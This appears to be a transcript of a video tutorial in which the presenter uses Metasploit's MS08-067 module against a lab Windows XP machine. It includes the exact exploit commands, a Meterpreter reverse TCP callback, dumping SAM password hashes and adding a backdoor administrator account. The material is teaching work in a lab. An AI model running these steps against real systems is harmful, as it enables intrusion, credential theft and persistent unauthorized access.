One of the favorite tools in an ethical hacker's toolbox is Metasploit Framework. Let's use it to execute a classic network attack. Let's have some fun with one of the most notorious buffer overflows in cyber history, and that is the Microsoft MS-08-067 Microsoft Server Service Relative Path Stack Corruption. That is a big, long, fancy way of saying a buffer overflow in the file and print service. I have two virtual machines here, XP and Kali. Let's just double check the IP address for XP. IP config, press enter. Okay, scroll over. It is 192.168.252.131. That's, of course, for me. Yours will be different. Let me come over to Kali. I will log on as Kali with the password of Kali and log in. What I need to do is launch Metasploit Framework. Let's go over to the app launcher here in the upper left. Click that, go down to Exploitation Tools, and choose Metasploit Framework. Click that. Need to provide the sudo password for Kali. It is Kali. Press enter. And let me just zoom in a bit so that we can see a little bit better. All right, so here we are. Just going to type clear so that we get rid of all of this banner stuff. The MS-08-067 was really something in its time, and it still is around because we still have legacy equipment, including ICS SCADA equipment. What this thing did was it took advantage of a flaw, what we call a parsing flaw in the Net API 32 DLL. So when this DLL would try to figure out the absolute path of some object, what we call path canonicalization, it was susceptible to a buffer overflow. What was really cool about it is that this buffer overflow, this path stack corruption overflow bug, was used by two exceptionally notorious worms. One was probably the granddaddy and grandmaster of all malware, the Stuxnet worm, and then the other was the Conficker worm, and it was used by both of them. So what we're going to do is we're just going to search, and we're going to search for exploit Windows, because we know that it impacts Windows, and we're going to search for SMB because it impacts server message block, meaning the file and print protocol of the file and print server service. And let's just get rid of the sort of the noise, and let's just say that the rank, : has to be great. So it's just going to narrow down our search to a handful of results. Press enter. And at the top of the list is the one we're interested in, this MS-08-067 Net API. We're going to choose it, so we'll just say use 0. I mean, you could say use and then type in this entire path, but you can just say use 0. Use 0, just like that. Press enter. Now it says, what do you want to have for a payload? Because this is the exploit, but we need to have a payload because, you know, the exploit is like kicking in the door. The payload is like throwing in the grenade once you've kicked the door in. So it says, well, you didn't pick a payload, so I'm going to default to the Meterpreter reverse TCP. And for us, that's just fine, meaning it'll come back to us and we will be able to have a reverse session. And in this case, we'll have administrative privilege in this reverse session. Okay, if we want information about it, we'll just type info, just like that. Press enter. We'll have to scroll back just a little bit, and it'll talk about it. This info is pretty darn cool. So it says it's this, and it, of course, is targeting Windows, and the rank is great, and it was disclosed at this time, written by these folks. The targets that it will target, we're just going to let it choose automatically, but from Windows 2000 to XP all the way up through Service Pack 0, 1, 2, 3, through all these different languages. And even beyond that, Server 2003, Service Pack 1 and 2. And I'll tell you, there are hospital instruments and machines that still run on Windows 2003. I mean, they just do, and they exist. So this is still a viable exploit. Okay, so we have to put in some options here. We have to put in the remote host IP address, which we have the IP, don't we? Also, what is the port we're targeting? It is the logon port for the file and print service. And we don't need to touch anything else besides just putting in the remote host IP. And it gives a description and some references. So we know that XP is, in my case, 192.168.252.131. So we will just say set our hosts 192.168.252.131. You put in the address that is appropriate for you. Press enter. And I'm just going to type clear so that I don't have to be at the bottom of the screen here. And let me just show options and just see what we have. Okay, so we have the target and all the things that we're supposed to put in, we've filled in. And we also have a payload, a reverse TCP interpreter session. Why don't we ping the target first just to make sure we have connectivity? I'm going to ping 192.168.252.131. Yep, sure enough. Control C to break that. Let me clear just so we can see. All right, here we go. You can type run or you can type exploit. Let's type exploit for the fun of it. Hit enter. Okay, it detected it. Windows XP Service Pack 2, English, and it's trying to trigger the vulnerability. It obviously was successful. It sent the stage, which is the big part of the exploit, and it opened an interpreter session. Notice how XP has a session with us. So we are listening on port 4444, and it's targeting XP 1151. Now, didn't we say it was 445? Yes, but even though the arrow points in this direction, it was XP that came back to us because it was a reverse TCP. And now look at this. We have an interpreter prompt. How cool is that? What can we do with the interpreter prompt? Well, we know what we can do. First of all, if you forget, just hit a question mark, enter. And let's scroll back and see all the cool things we can do here. Here are the core commands for interpreter, but let's go down to the juicy stuff here. We could do stuff to the file system, delete things, we could edit stuff, we could just list stuff, create directories, print the current directory, we could remove directories, we could move things, we could delete specific files. Wow, there's just so much stuff. Upload something. I mean, you can do everything. So I want to scroll down here a little bit, and I want to find out who am I. Let's just get UID. Who am I? I am the highest privilege level possible on this victim. System. That's higher than administrator. Wow. So if I wasn't system, I could try to say get system, but it's going to tell me, hey, you already are. Press enter. Yeah, you already are. You're as high as it goes. Wow. You know, we could dump the hashes from the SAM database because, you know, when Windows boots up, everything in the Security Account Manager database, all of the usernames, passwords, they get loaded up. And we could just dump them right now. Let's just like hash dump. Let's hash dump. Enter. Oh, wow. Look at this. Hashes for administrator and admin. So we could, you know, like copy from here to here and send it to a password cracker if we wanted to. That's cool. How about if we drop to a shell? So I'll just clear here a bit so I can, oh no, interpreter doesn't understand clear. Okay, let's just say shell. All right, and now check it out. Recognize this? This is a Windows command prompt. I have a command prompt right now, and if I type who am I, because at this point I have to type Windows command prompt commands, DOS type commands, who am I? Oh, XP doesn't understand who am I. Sorry. Well, let's do something. Let's create a backdoor. Net user hacker. What's hacker's password? Let me in. Add hacker. Enter. Ah, yeah. Let's net local group, one word, administrators / add hacker with 2 Ks. Press enter. All right, let's take a look. If we just type net user, it should list everybody. Oh, there's hacker along with admin and administrator. If we net local group, administrators, who's a member? Hacker. Cool. If we go over to XP, let's just go over to XP right now. Let me just drop Kali. So here we are in XP. I mean, we could just say net user here, and there's hacker. We could also click Start and go to Control Panel and go to the Administrative Tools and go to Computer Management and go to Local Users and Groups and Users, and there's Hacker right there. And double-click Hacker, and Hacker is a member of Administrators. We've totally pwned this machine using one of the most notorious in all history buffer overflow exploits. And Metasploit made it easy.